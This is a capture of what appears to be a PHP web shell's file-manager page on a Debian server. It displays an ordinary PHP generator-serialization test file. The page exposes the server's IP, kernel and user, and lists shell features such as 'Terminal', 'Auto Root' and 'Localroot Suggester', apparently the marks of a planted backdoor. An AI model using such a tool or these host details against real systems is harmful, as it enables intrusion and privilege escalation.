Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
Zend /
tests /
generators /
errors /
Delete
Unzip
Name
Size
Permission
Date
Action
count_error.phpt
275
B
-rw-rw-r--
2022-10-31 11:36
generator_extend_error.phpt
225
B
-rw-rw-r--
2022-10-31 11:36
generator_instantiate_error.phpt
292
B
-rw-rw-r--
2022-10-31 11:36
non_ref_generator_iterated_by_ref_error.phpt
337
B
-rw-rw-r--
2022-10-31 11:36
resume_running_generator_error.phpt
592
B
-rw-rw-r--
2022-10-31 11:36
serialize_unserialize_error.phpt
896
B
-rw-rw-r--
2022-10-31 11:36
yield_const_by_ref_error.phpt
280
B
-rw-rw-r--
2022-10-31 11:36
yield_in_force_closed_finally_error.phpt
610
B
-rw-rw-r--
2022-10-31 11:36
yield_non_ref_function_call_by_ref_error.phpt
317
B
-rw-rw-r--
2022-10-31 11:36
yield_outside_function_error.phpt
185
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Generators can't be serialized or unserialized --FILE-- <?php function gen() { yield; } $gen = gen(); try { serialize($gen); } catch (Exception $e) { echo $e, "\n\n"; } try { var_dump(unserialize('O:9:"Generator":0:{}')); } catch (Exception $e) { echo $e, "\n\n"; } try { var_dump(unserialize('C:9:"Generator":0:{}')); } catch (Exception $e) { echo $e; } ?> --EXPECTF-- Exception: Serialization of 'Generator' is not allowed in %s:%d Stack trace: #0 %s(%d): serialize(Object(Generator)) #1 {main} Warning: Erroneous data format for unserializing 'Generator' in %sserialize_unserialize_error.php on line %d Notice: unserialize(): Error at offset 19 of 20 bytes in %sserialize_unserialize_error.php on line %d bool(false) Exception: Unserialization of 'Generator' is not allowed in %s:%d Stack trace: #0 %s(%d): unserialize('C:9:"Generator"...') #1 {main}